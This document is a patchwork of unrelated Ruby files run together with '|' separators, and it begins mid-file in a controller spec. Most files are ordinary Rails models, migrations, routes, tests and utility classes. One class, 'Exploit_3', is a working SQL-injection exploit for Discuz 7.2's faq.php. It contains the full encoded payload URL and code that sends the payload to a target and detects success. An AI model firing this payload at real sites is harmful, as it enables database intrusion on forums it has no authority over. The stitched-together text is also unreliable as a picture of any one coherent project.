letter_conversation = LetterConversation.last
expect(letter_conversation.sender_id).to eq(valid_attributes[:sender_id])
expect(letter_conversation.recipient_id).to eq(valid_attributes[:recipient_id])
end
end
end
describe "GET edit" do
it 'returns http success' do
get :edit, id: letter_conversation
expect(response).to have_http_status(:success)
end
it 'assigns the letter_conversation' do
get :edit, id: letter_conversation
expect(assigns(:letter_conversation)).to eq(letter_conversation)
end
end
describe "GET show" do
it 'returns http success' do
get :show, id: letter_conversation
expect(response).to have_http_status(:success)
end
it 'assigns the letter_conversation' do
get :show, id: letter_conversation
expect(assigns(:letter_conversation)).to eq(letter_conversation)
end
it "should render the form elements" do
get :show, id: letter_conversation
expect(page).to have_content(letter_conversation.sender.name)
expect(page).to have_content(letter_conversation.recipient.name)
expect(page).to have_content(message.body)
end
end
end |
$evm.log("info", "********* my_validate_tag - GetIP STARTED *********")
begin
@method = 'my_validate_tag'
$evm.log("info", "===== EVM Automate Method: <#{@method}> Started")
# Turn of debugging
@debug = true
# Log the inbound object
$evm.log("info", "===========================================")
process = $evm.object("process")
$evm.log("info", "Listing Process Attributes:")
process.attributes.sort.each { |k, v| $evm.log("info", "\t#{k}: #{v}")} if @debug
$evm.log("info", "===========================================")
vm = $evm.root['vm']
$evm.log("info", "Got VM from root object")
$evm.log("info","Inspecting vm: #{vm.inspect}") if @debug
ems = vm.ext_management_system
$evm.log("info", "Got EMS <#{ems.name}> from VM <#{vm.name}>")
$evm.log("info","Inspecting ems: #{ems.inspect}") if @debug
host = vm.host
$evm.log("info", "Got Host <#{host.name}> from VM <#{vm.name}>")
$evm.log("info","Inspecting host: #{host.inspect}") if @debug
tags = vm.tags
$evm.log("info", "#{@method} Template Tags - #{vm.tags}")
tags.each do |t|
s = t.split("/")
if s[0] == 'cloned'
if s[1] == 'true'
$evm.log("error", "<#{@method}>: VM Tagged with <#{s[0]}> y <#{s[1]}>")
exit MIQ_ABORT
end
end
end
#
# Exit method
#
$evm.log("info", "<#{@method}>--===== #{vm.name} not tagged with tag cloned ========")
$evm.log("info", "===== EVM Automate Method: <#{@method}> Ended")
exit MIQ_OK
rescue => err
$evm.log("error", "<#{@method}>: [#{err}]\n#{err.backtrace.join("\n")}")
exit MIQ_STOP
end
|
require File.expand_path(File.dirname(__FILE__) + '/page_object')
class ApiPage < PageObject
def initialize(page)
super(page)
@url_base = '/api/'
end
def visit_subscriptions(person, type = nil)
if person.respond_to?(:id)
id = person.id
else
id = person.to_i
end
if type.nil?
visit "#{@url_base}#{id}/subscriptions"
else
visit "#{@url_base}#{id}/subscriptions?type=#{type.singularize}"
end
end
end
|
class Expense < ActiveRecord::Base
STATUSES = %w(Pending Approved Rejected)
belongs_to :user
belongs_to :category
has_one :expense_job_title_assignment
has_one :job_title_assignment, through: :expense_job_title_assignment, class_name: JobTitleAssignment
validates :user, :date, :category, :description, :amount, presence: true
validates :status, inclusion: { in: STATUSES, allow_blank: false }
validates :currency, inclusion: { in: ExchangeRate::CURRENCIES, allow_blank: false }
delegate :name, to: :category, prefix: true
delegate :name, to: :user, prefix: true
delegate :job_title, :department, to: :job_title_assignment, allow_nil: true
delegate :name, to: :department, prefix: true, allow_nil: true
delegate :name, to: :job_title, prefix: true, allow_nil: true
scope :rejected, -> { where(status: "Rejected") }
scope :pending, -> { where(status: "Pending") }
scope :approved, -> { where(status: "Approved") }
scope :for_month, lambda { |month| where("to_char(date, 'YYYY-MM') = ?", month) }
searchable do
integer :user_id
text :user_name, :department_name, :job_title_name, :date, :category_name, :description, :currency, :amount, :status
string :s_user_name do user_name end
string :s_department_name do department_name end
string :s_job_title_name do job_title_name end
date :s_date do date end
string :s_category_name do category_name end
string :s_description do description end
string :s_currency do currency end
double :s_amount do amount end
string :s_status do status end
end
handle_asynchronously :solr_index
# In theory, currency should not have to be sanitized because it comes from
# the expenses.currency database column, which should have been validated
# against a list of approved currencies. This method and the
# self.joins_exchange_rates methods sanitize them anyways just in case
def self.sum_in(currency)
joins_exchange_rates(currency)
.sum("CASE WHEN expenses.currency = #{sanitize(currency)} THEN expenses.amount ELSE (expenses.amount * exchange_rates.rate) END")
end
def approved?
status == "Approved"
end
def rejected?
status == "Rejected"
end
def pending?
status == "Pending"
end
private
def self.joins_exchange_rates(currency)
joins("LEFT OUTER JOIN exchange_rates
ON exchange_rates.anchor = expenses.currency
AND exchange_rates.float = #{sanitize(currency)}
AND expenses.date BETWEEN exchange_rates.starts_on AND exchange_rates.ends_on")
end
private_class_method :joins_exchange_rates
end
|
require 'leaderboard'
class TieRankingLeaderboard < Leaderboard
# Default options when creating a leaderboard. Page size is 25 and reverse
# is set to false, meaning various methods will return results in
# highest-to-lowest order.
DEFAULT_OPTIONS = {
:page_size => DEFAULT_PAGE_SIZE,
:reverse => false,
:member_key => :member,
:rank_key => :rank,
:score_key => :score,
:member_data_key => :member_data,
:member_data_namespace => 'member_data',
:ties_namespace => 'ties'
}
# Create a new instance of a leaderboard.
#
# @param leaderboard [String] Name of the leaderboard.
# @param options [Hash] Options for the leaderboard such as +:page_size+.
# @param redis_options [Hash] Options for configuring Redis.
#
# Examples
#
# leaderboard = Leaderboard.new('highscores')
# leaderboard = Leaderboard.new('highscores', {:page_size => 10})
def initialize(leaderboard_name, options = DEFAULT_OPTIONS, redis_options = DEFAULT_REDIS_OPTIONS)
super
leaderboard_options = DEFAULT_OPTIONS.dup
leaderboard_options.merge!(options)
@ties_namespace = leaderboard_options[:ties_namespace]
end
# Delete the named leaderboard.
#
# @param leaderboard_name [String] Name of the leaderboard.
def delete_leaderboard_named(leaderboard_name)
@redis_connection.multi do |transaction|
transaction.del(leaderboard_name)
transaction.del(member_data_key(leaderboard_name))
transaction.del(ties_leaderboard_key(leaderboard_name))
end
end
# Change the score for a member in the named leaderboard by a delta which can be positive or negative.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param member [String] Member name.
# @param delta [float] Score change.
def change_score_for_member_in(leaderboard_name, member, delta)
previous_score = score_for(member)
new_score = previous_score + delta
total_members_at_previous_score = @redis_connection.zrevrangebyscore(leaderboard_name, previous_score, previous_score)
@redis_connection.multi do |transaction|
transaction.zadd(leaderboard_name, new_score, member)
transaction.zadd(ties_leaderboard_key(leaderboard_name), new_score, new_score.to_f.to_s)
end
if total_members_at_previous_score.length == 1
@redis_connection.zrem(ties_leaderboard_key(leaderboard_name), previous_score.to_f.to_s)
end
end
# Rank a member in the named leaderboard.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param member [String] Member name.
# @param score [float] Member score.
# @param member_data [String] Optional member data.
def rank_member_in(leaderboard_name, member, score, member_data = nil)
@redis_connection.multi do |transaction|
transaction.zadd(leaderboard_name, score, member)
transaction.zadd(ties_leaderboard_key(leaderboard_name), score, score.to_f.to_s)
transaction.hset(member_data_key(leaderboard_name), member, member_data) if member_data
end
end
# Rank a member across multiple leaderboards.
#
# @param leaderboards [Array] Leaderboard names.
# @param member [String] Member name.
# @param score [float] Member score.
# @param member_data [String] Optional member data.
def rank_member_across(leaderboards, member, score, member_data = nil)
@redis_connection.multi do |transaction|
leaderboards.each do |leaderboard_name|
transaction.zadd(leaderboard_name, score, member)
transaction.zadd(ties_leaderboard_key(leaderboard_name), score, score.to_f.to_s)
transaction.hset(member_data_key(leaderboard_name), member, member_data) if member_data
end
end
end
# Rank an array of members in the named leaderboard.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param members_and_scores [Splat or Array] Variable list of members and scores
def rank_members_in(leaderboard_name, *members_and_scores)
if members_and_scores.is_a?(Array)
members_and_scores.flatten!
end
@redis_connection.multi do |transaction|
members_and_scores.each_slice(2) do |member_and_score|
transaction.zadd(leaderboard_name, member_and_score[1], member_and_score[0])
transaction.zadd(ties_leaderboard_key(leaderboard_name), member_and_score[0], member_and_score[0].to_f.to_s)
end
end
end
# Remove a member from the named leaderboard.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param member [String] Member name.
def remove_member_from(leaderboard_name, member)
member_score = @redis_connection.zscore(leaderboard_name, member) || nil
can_delete_score = member_score && members_from_score_range_in(leaderboard_name, member_score, member_score).length == 1
@redis_connection.multi do |transaction|
transaction.zrem(leaderboard_name, member)
transaction.zrem(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s) if can_delete_score
transaction.hdel(member_data_key(leaderboard_name), member)
end
end
# Retrieve the rank for a member in the named leaderboard.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param member [String] Member name.
#
# @return the rank for a member in the leaderboard.
def rank_for_in(leaderboard_name, member)
member_score = score_for_in(leaderboard_name, member)
if @reverse
return @redis_connection.zrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s) + 1 rescue nil
else
return @redis_connection.zrevrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s) + 1 rescue nil
end
end
# Retrieve the score and rank for a member in the named leaderboard.
#
# @param leaderboard_name [String]Name of the leaderboard.
# @param member [String] Member name.
#
# @return the score and rank for a member in the named leaderboard as a Hash.
def score_and_rank_for_in(leaderboard_name, member)
member_score = @redis_connection.zscore(leaderboard_name, member)
responses = @redis_connection.multi do |transaction|
transaction.zscore(leaderboard_name, member)
if @reverse
transaction.zrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s)
else
transaction.zrevrank(ties_leaderboard_key(leaderboard_name), member_score.to_f.to_s)
end
end
responses[0] = responses[0].to_f if responses[0]
responses[1] = responses[1] + 1 rescue nil
{@member_key => member, @score_key => responses[0], @rank_key => responses[1]}
end
# Remove members from the named leaderboard in a given score range.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param min_score [float] Minimum score.
# @param max_score [float] Maximum score.
def remove_members_in_score_range_in(leaderboard_name, min_score, max_score)
@redis_connection.multi do |transaction|
transaction.zremrangebyscore(leaderboard_name, min_score, max_score)
transaction.zremrangebyscore(ties_leaderboard_key(leaderboard_name), min_score, max_score)
end
end
# Expire the given leaderboard in a set number of seconds. Do not use this with
# leaderboards that utilize member data as there is no facility to cascade the
# expiration out to the keys for the member data.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param seconds [int] Number of seconds after which the leaderboard will be expired.
def expire_leaderboard_for(leaderboard_name, seconds)
@redis_connection.multi do |transaction|
transaction.expire(leaderboard_name, seconds)
transaction.expire(ties_leaderboard_key(leaderboard_name), seconds)
transaction.expire(member_data_key(leaderboard_name), seconds)
end
end
# Expire the given leaderboard at a specific UNIX timestamp. Do not use this with
# leaderboards that utilize member data as there is no facility to cascade the
# expiration out to the keys for the member data.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param timestamp [int] UNIX timestamp at which the leaderboard will be expired.
def expire_leaderboard_at_for(leaderboard_name, timestamp)
@redis_connection.multi do |transaction|
transaction.expireat(leaderboard_name, timestamp)
transaction.expireat(ties_leaderboard_key(leaderboard_name), timestamp)
transaction.expireat(member_data_key(leaderboard_name), timestamp)
end
end
# Retrieve a page of leaders from the named leaderboard for a given list of members.
#
# @param leaderboard_name [String] Name of the leaderboard.
# @param members [Array] Member names.
# @param options [Hash] Options to be used when retrieving the page from the named leaderboard.
#
# @return a page of leaders from the named leaderboard for a given list of members.
def ranked_in_list_in(leaderboard_name, members, options = {})
leaderboard_options = DEFAULT_LEADERBOARD_REQUEST_OPTIONS.dup
leaderboard_options.merge!(options)
ranks_for_members = []
responses = @redis_connection.multi do |transaction|
members.each do |member|
if @reverse
transaction.zrank(leaderboard_name, member)
else
transaction.zrevrank(leaderboard_name, member)
end
transaction.zscore(leaderboard_name, member)
end
end unless leaderboard_options[:members_only]
members.each_with_index do |member, index|
data = {}
data[@member_key] = member
unless leaderboard_options[:members_only]
data[@score_key] = responses[index * 2 + 1].to_f if responses[index * 2 + 1]
if @reverse
data[@rank_key] = @redis_connection.zrank(ties_leaderboard_key(leaderboard_name), data[@score_key].to_s) + 1 rescue nil
else
data[@rank_key] = @redis_connection.zrevrank(ties_leaderboard_key(leaderboard_name), data[@score_key].to_s) + 1 rescue nil
end
end
if leaderboard_options[:with_member_data]
data[@member_data_key] = member_data_for_in(leaderboard_name, member)
end
ranks_for_members << data
end
case leaderboard_options[:sort_by]
when :rank
ranks_for_members = ranks_for_members.sort_by { |member| member[@rank_key] }
when :score
ranks_for_members = ranks_for_members.sort_by { |member| member[@score_key] }
end
ranks_for_members
end
protected
# Key for ties leaderboard.
#
# @param leaderboard_name [String] Name of the leaderboard.
#
# @return a key in the form of +leaderboard_name:ties_namespace+
def ties_leaderboard_key(leaderboard_name)
"#{leaderboard_name}:#{@ties_namespace}"
end
end |
# frozen_string_literal: true
class TagPolicy < ApplicationPolicy
class Scope
attr_reader :user, :scope
def initialize(user, scope)
@user = user
@scope = scope
end
def resolve
if user.global_role?
scope.all
else
scope.where(organization_id: user.membership_organizations).or(scope.where(shared: true))
end
end
def resolve_for_organization_id(organization_id)
scope.where(organization_id: organization_id).or(scope.where(shared: true))
end
end
end
|
class SelectionSimulation
NUM_TO_ROUND = 5
#run this as a concurrent set of user's from the 'concurrent_selection_simulation.sh' script
def initialize(user_offset)
@retire_num = 3
# @active_user_set = User.limit(10).offset(user_offset).map(&:id)
@active_user_set = (1..10).to_a.map { |n| user_offset + n }
@query_times = []
end
def run
#prime the DB connection
ProjectSubject.first
@active_user_set.each do |user_id|
select_user_subjects(user_id)
end
puts "#{@query_times.min}, #{@query_times.max}, #{ave_query_time}, #{median_query_time}, [ #{@query_times.join(" ")} ]"
end
private
def select_user_subjects(user_id)
# query = "'#{user_id}' != ALL (seen_user_ids) AND (array_length(seen_user_ids, 1) IS NULL OR array_length(seen_user_ids, 1) < #{@retire_num})"
query = "NOT (seen_user_ids @> '{#{user_id}}') AND (array_length(seen_user_ids, 1) IS NULL OR array_length(seen_user_ids, 1) < #{@retire_num})"
@query_times << Benchmark.measure { ProjectSubject.where(active: true).where(query).limit(100).sample(10) }.real
#don't saturate the machine - limit to 10 queries / second or so...
sleep(0.1)
end
def query_times_length
@qt_length ||= @query_times.length
end
def ave_query_time
ave = @query_times.inject(&:+) / query_times_length
ave.round(NUM_TO_ROUND)
end
def median_query_time
len = query_times_length
sorted = @query_times.sort
median = len % 2 == 1 ? sorted[len/2] : (sorted[len/2 - 1] + sorted[len/2]).to_f / 2
median.round(NUM_TO_ROUND)
end
end
|
class Like < ApplicationRecord
belongs_to :speak , optional: true
belongs_to :st_user , optional: true
belongs_to :ad_user , optional: true
counter_culture :speak
validates :ad_user_or_st_user, presence: true
validates :speak_id, presence: true
def ad_user_or_st_user
ad_user_id.presence or st_user_id.presence
end
end
|
require 'minitest/autorun'
require 'rubygems'
require 'bundler/setup'
require 'pry'
require 'mocha/mini_test'
require "net/http"
require 'sqlite3'
require File.join(__dir__, '..', '..', 'app', 'models', 'user')
require File.join(__dir__, '..', '..', 'app', 'models', 'user_Submission')
require File.join(__dir__, '..', '..', 'app', 'models', 'user_submission')
ENV['environment'] = 'test'
describe User do
before do
@db = SQLite3::Database.new File.join(__dir__, '..', 'fixtures', 'subreddit_analysis_test.db')
@client = MiniTest::Mock.new
@client.expect(:user_from_name, stub(name: 'foo', to_json: { name: 'foo' }.to_json), ['foo'])
User.connections(@db)
User.reddit_client(@client)
User.init_table
end
after do
User.destroy_table
@db.close
end
describe "new instance" do
before do
@user = User.new
@user.name = 'foo'
end
it "lazy loads reddit_object" do
@user.reddit_object
assert(@client.verify)
end
it "default submitted_ended_at to 0" do
assert_equal(0, @user.submissions_ended_at)
end
it "default comments_ended_at to 0" do
assert_equal(0, @user.comments_ended_at)
end
it "saves" do
@user.save
assert_equal(1, @db.execute("select count(*) from users;").first.first)
end
describe "cascade save" do
before do
UserComment.init_table
UserSubmission.init_table
@user.comments = [UserComment.new(user: @user, subreddit_name: 'funny')]
@user.submissions = [UserSubmission.new(user: @user, subreddit_name: 'funny')]
@user.save
end
after do
UserComment.destroy_table
UserSubmission.destroy_table
end
it "cascade saves comments" do
assert_equal(1, @db.execute("select count(*) from user_comments where user_name='#{@user.name}';").first.first)
end
it "cascade saves submissions" do
assert_equal(1, @db.execute("select count(*) from user_submissions where user_name='#{@user.name}';").first.first)
end
end
describe "get_comments" do
before do
mock_comment = stub(subreddit: 'foo_subreddit', fullname: 'qey44v')
@reddit_object = MiniTest::Mock.new
@reddit_object.expect(:nil?, false)
@reddit_object.expect(:get_comments, [mock_comment], [{limit: 100, count: 10, after: 'bar'}])
@user.comments = [UserComment.new(user: @user, subreddit_name: 'foo_subreddit')]
@user.reddit_object = @reddit_object
@user.comments_after = 'bar'
@user.get_comments(100, 10)
end
it "gets comments from reddit" do
assert(@reddit_object.verify)
end
it "uniques the list" do
assert_equal(1, @user.comments.length)
end
it "increments ended at" do
assert_equal(100, @user.comments_ended_at)
end
it "sets after" do
assert_equal('qey44v', @user.comments_after)
end
end
describe "get_submissions" do
before do
reddit_submission = stub(subreddit: 'foo_subreddit', fullname: 'qey44v')
@reddit_object = MiniTest::Mock.new
@reddit_object.expect(:nil?, false)
@reddit_object.expect(:get_submitted, [reddit_submission], [{limit: 100, count: 10, after: 'bar'}])
@user.submissions = [UserSubmission.new(user: @user, subreddit_name: 'foo_subreddit', name: 'bar_name')]
@user.reddit_object = @reddit_object
@user.submissions_after = 'bar'
@user.get_submissions(100, 10)
end
it "gets submissions from reddit" do
assert(@reddit_object.verify)
end
it "uniques the list" do
assert_equal(1, @user.submissions.length)
end
it "increments ended at" do
assert_equal(100, @user.submissions_ended_at)
end
it "sets after" do
assert_equal('qey44v', @user.submissions_after)
end
end
end
describe 'create' do
before do
User.create('foo')
end
it "finds user_from_name" do
assert(@client.verify)
end
it "creates database" do
assert(@db.execute("select count(*) from users where name = 'foo';").first.first == 1)
end
end
describe 'find' do
before do
UserComment.init_table
UserSubmission.init_table
user = User.create('foo')
UserSubmission.create(user, 'foo_subreddit')
UserComment.create(user, 'foo_subreddit')
@user = User.find('foo')
end
after do
UserComment.destroy_table
UserSubmission.destroy_table
end
it "finds user by name" do
assert_equal('foo', @user.name)
end
it "finds existing comments" do
assert_equal(1, @user.comments.length)
end
it "finds existing submissions" do
assert_equal(1, @user.submissions.length)
end
end
it "inits db" do
assert(@db.execute("select count(*) from users;").first.first == 0)
end
end
|
Rails.application.routes.draw do
#get 'welcome/index'
devise_for :users
#root :to => 'posts#index'
resources :posts
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
# the followed are routes for the user_controller
get "all_users", to: "users#all_users", as: "all_users"
patch "/users/:id/like", to: "users#follow", as: "follow"
#get "/users/:id/dashboard", to: "users#dashboard", as: "user_dashboard"
patch "/posts/:id/adds", to: "posts#adds", as: "adds"
post "/posts/add_category", to: "posts#add_category", as: "add_category"
delete "/users/:id/unadds", to: "users#unadds", as: "unadds"
delete "/users/:id/unlike", to: "users#unfollow", as: "unfollow"
get "/users/:id/dashboard", to: "users#dashboard", as: "user_dashboard"
get "/users/:id/profile", to: "users#profile", as: "user_profile"
# the routes for category_controller
get "/categories", to: "categories#index", as: "categories"
get "/categories/:id", to: "categories#show", as: "category"
post "/categories", to: "categories#create", as: "create_category"
patch "/category/:id", to: "categories#update", as: "update_category"
delete "/category/:id", to: "categories#destroy", as: "destroy_category"
root :to => 'welcome#index'
end
|
class AddAgreementAndInstitutionalProgramsToAll < ActiveRecord::Migration
def change
add_column :activities, :agreement_id, :integer
add_column :article_referees, :agreement_id, :integer
add_column :awards, :agreement_id, :integer
add_column :books, :agreement_id, :integer
add_column :conference_articles, :agreement_id, :integer
add_column :conferences, :agreement_id, :integer
add_column :journal_articles, :agreement_id, :integer
add_column :networks, :agreement_id, :integer
add_column :organizers, :agreement_id, :integer
add_column :patents, :agreement_id, :integer
add_column :projects, :agreement_id, :integer
add_column :scientific_associations, :agreement_id, :integer
add_column :scientific_visits, :agreement_id, :integer
add_column :works, :agreement_id, :integer
add_column :activities, :institutional_program_id, :integer
add_column :article_referees, :institutional_program_id, :integer
add_column :awards, :institutional_program_id, :integer
add_column :books, :institutional_program_id, :integer
add_column :conference_articles, :institutional_program_id, :integer
add_column :conferences, :institutional_program_id, :integer
add_column :journal_articles, :institutional_program_id, :integer
add_column :networks, :institutional_program_id, :integer
add_column :organizers, :institutional_program_id, :integer
add_column :patents, :institutional_program_id, :integer
add_column :scientific_associations, :institutional_program_id, :integer
add_column :scientific_visits, :institutional_program_id, :integer
add_column :works, :institutional_program_id, :integer
end
end
|
FactoryGirl.define do
factory :tag do
name "test"
user
factory :invalid_tag do
name nil
user
end
factory :tag_with_contacts do
transient do
contacts_count 2
end
after(:create) do |tag, evaluator|
create_list(:contact, evaluator.contacts_count, tag: tag)
end
end
end
end
|
class AddIndexesToUserNoticePhotoDocument < ActiveRecord::Migration
def change
add_column :documents, :notice_id, :integer
add_index :documents, :notice_id
add_column :photos, :notice_id, :integer
add_index :photos, :notice_id
add_column :notices, :project_id, :integer
add_index :notices, :project_id
end
end
|
# frozen_string_literal: true
require 'test_helper'
class StringTemplateTest < Minitest::Test
def setup
@view = if ActionView::VERSION::MAJOR >= 6
Class.new(ActionView::Base.with_empty_template_cache).with_view_paths([__dir__])
else
Class.new(ActionView::Base).new(ActionView::LookupContext.new(__dir__))
end
super
end
def assert_render(expected, template, options = {})
result = @view.render(options.merge(inline: template, type: 'string'))
assert_equal expected, result
end
def test_no_interpolation
assert_render 'hello', 'hello'
end
def test_basic_interpolation
assert_render 'hello', '#{"hello"}'
end
def test_ivar
@view.instance_variable_set :@foo, 'hello'
assert_render 'hello', '#{@foo}'
end
def test_if
assert_render 'hello', '#{if true;"hello";end}'
assert_render 'hello', '#{"hello" if true}'
end
def test_each_as_map_and_join
assert_render "hello\nhello\nhello",
'#{[*1..3].map do
"hello"
end.join("\n")}'
end
def test_each_with_object
assert_render "hello\nhello\nhello\n",
'#{[*1..3].each_with_object("".dup) do |i, s|
s << "hello\n"
end}'
end
def test_locals
assert_render 'hello', '#{foo}', locals: {foo: 'hello'}
end
def test_render_partial
result = @view.render(template: 'main', handlers: :string)
assert_equal 'hello, world!', result.strip
end
end
|
class SessionsController < ApplicationController
skip_before_filter :check_authentication
def new
@title = "login"
end
def create
begin
@request_path = session[:request_path]
reset_session
@session_user = SimpleUser.authenticate(params[:primary_email], params[:password])
if @session_user
session[:user] = @session_user.id
redirect_to @request_path.present? ? @request_path : person_path(@session_user) and return true
else
redirect_to :welcome
end
rescue SecurityError => e
flash[:error] = 'The email address or password you provided does not match our records.'
redirect_to :login
rescue
end
end
def destroy
@session_user = nil
session[:user] = nil
reset_session
redirect_to :welcome
end
end
|
# encoding: utf-8
require 'net/http'
require 'uri'
class Exploit_3 < Playload::Issue
def initialize
@name = "Discuz7.2 SQL"
@type = "discuz"
@tags = "discuz"
@description = %q{Discuz7.2 faq.php Sql Exp: /bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%281%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23}
@references = {'sebug' => 'http://sebug.net/vuldb/ssvid-87114'}
@severity = :high
@remedy_guidance = "SQL过滤"
@is_found = false
@is_error = false
end
def exp(url)
begin
uri = URI(url + '/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28md5%281%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23')
response = Net::HTTP.get_response(uri)
if response.body.include?('c4ca4238a0b923820dcc509a6f75849b1') then
@is_found = true
end
rescue
puts "Send Exp Failed: #{$!}"
end
end
end
Playload::Queue.add Exploit_3.new
|
class Tagging < ApplicationRecord
belongs_to :book
belongs_to :tag
end
|
# @param {Integer[]} nums
# @return {Boolean}
def contains_duplicate(nums)
hash_nums = {}
nums.each do |element|
if hash_nums.has_key?(element)
return true
else
hash_nums[element] = 1
end
end
return false
end
|
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the bin/rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
require 'faker'
# Restaurant.destroy_all
puts 'Creating 100 fake restaurants...'
50.times do
restaurant = Restaurant.new(
name: Faker::Company.name,
address: "#{Faker::Address.street_address}, #{Faker::Address.city}",
category: ['American', 'Italian', 'Dutch', 'Greek', 'French', 'Turkish'].sample,
phone_number: Faker::PhoneNumber.phone_number_with_country_code
)
restaurant.save!
review = Review.new( content: "blah",
rating: 5)
review.restaurant = restaurant
review.save!
end
puts 'Finished!'
|
#!/usr/bin/ruby -w
#
# Test etch's handling of creating and updating the original (orig) and
# history files
#
require File.expand_path('etchtest', File.dirname(__FILE__))
class EtchHistoryTests < Test::Unit::TestCase
include EtchTests
def setup
# Generate a file to use as our etch target/destination
@targetfile = released_tempfile
#puts "Using #{@targetfile} as target file"
# Generate a directory for our test repository
@repodir = initialize_repository
@server = get_server(@repodir)
# Create a directory to use as a working directory for the client
@testroot = tempdir
#puts "Using #{@testroot} as client working directory"
@origfile = File.join(@testroot, 'var', 'etch', 'orig', "#{@targetfile}.ORIG")
@historydir = File.join(@testroot, 'var', 'etch', 'history', "#{@targetfile}.HISTORY")
end
def test_history
#
# Ensure original file is backed up and history log started
#
testname = 'initial history test'
# Put some text into the original file so that we can make sure it was
# properly backed up.
origcontents = "This is the original text\n"
File.open(@targetfile, 'w') do |file|
file.write(origcontents)
end
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(sourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents, get_file_contents(@origfile), 'original backup of file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, '0000')), '0000 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, 'current')), 'current history file')
#
# Ensure history log is updated and original file does not change
#
testname = 'history update'
updatedsourcecontents = "This is a second test\n"
File.open("#{@repodir}/source/#{@targetfile}/source", 'w') do |file|
file.write(updatedsourcecontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents, get_file_contents(@origfile), 'original backup of file unchanged')
assert_equal(origcontents, get_file_contents(File.join(@historydir, '0000')), '0000 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, '0001')), '0001 history file')
assert_equal(updatedsourcecontents, get_file_contents(File.join(@historydir, 'current')), 'updated current history file')
#
# Test revert feature
#
testname = 'revert'
# Intentionally mix revert with other instructions to make sure the file
# is reverted and nothing else happens.
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<revert/>
<file>
<warning_file/>
<source>
<plain>source</plain>
</source>
</file>
</config>
EOF
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents, get_file_contents(@targetfile), 'original contents reverted')
assert(!File.exist?(@origfile), 'reverted original file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, '0000')), '0000 history file')
assert_equal(sourcecontents, get_file_contents(File.join(@historydir, '0001')), '0001 history file')
assert_equal(updatedsourcecontents, get_file_contents(File.join(@historydir, '0002')), '0002 history file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, 'current')), 'reverted current history file')
#
# Update the contents of a reverted file and make sure etch doesn't
# overwrite them, as it should no longer be managing the file.
#
testname = 'no update to reverted file'
updatedorigcontents = "This is new original text\n"
File.open(@targetfile, 'w') do |file|
file.write(updatedorigcontents)
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(updatedorigcontents, get_file_contents(@targetfile), 'Updated original contents unchanged')
assert(!File.exist?(@origfile), 'reverted original file')
assert_equal(origcontents, get_file_contents(File.join(@historydir, 'current')), 'Updated reverted current history file')
end
def test_history_setup
#
# Use a setup command to put some contents into the target file (to
# simulate a common usage of setup commands to install a package before
# we backup the original file so that the original file has the default
# config file contents) and ensure those contents are backed up as the
# original file.
#
# Generate the file contents with a script which incorporates the original
# contents so that we also ensure that the client sends us the correct
# contents on the first try. We once had a bug where it took a couple of
# tries before we achieved convergence and the client sent the correct
# original contents.
#
testname = 'history setup'
origcontents = "This is the original text"
FileUtils.mkdir_p("#{@repodir}/source/#{@targetfile}")
File.open("#{@repodir}/source/#{@targetfile}/config.xml", 'w') do |file|
file.puts <<-EOF
<config>
<setup>
<exec>echo "#{origcontents}" > #{@targetfile}</exec>
</setup>
<file>
<warning_file/>
<source>
<script>source.script</script>
</source>
</file>
</config>
EOF
end
sourcecontents = "This is a test\n"
File.open("#{@repodir}/source/#{@targetfile}/source.script", 'w') do |file|
file.puts("@contents << '#{sourcecontents}'")
file.puts("@contents << IO.read(@original_file)")
end
assert_etch(@server, @testroot, :testname => testname)
assert_equal(origcontents + "\n", get_file_contents(@origfile), 'original backup of file via setup')
assert_equal(sourcecontents + origcontents + "\n", get_file_contents(@targetfile), 'contents using original backup of file via setup')
end
def test_delayed_history_setup
#
# Like the previous test this uses a setup command to put some content
# into the target file. However, the first run of etch is such that there
# is no configuration for the file on this particular client, and then a
# second run where the client is added to a node group such that the
# configuration for the file now applies. Ensure that the original is not
# saved until after the file configuration applies to this host and the
# setup command has a chance to run.
#
# Imagine for example that you have configuration for DNS servers in your
# repository, which includes a setup command which installs BIND and then
# configuration which operates on the original config file from the BIND
# package. You have a server that is running etch but not configured as
# anything particular and you decide to make it a DNS server. If etch
# saved the original file the first time it ran on that box it would have
# saved a NOORIG file, and then when you added the box to the dns_servers
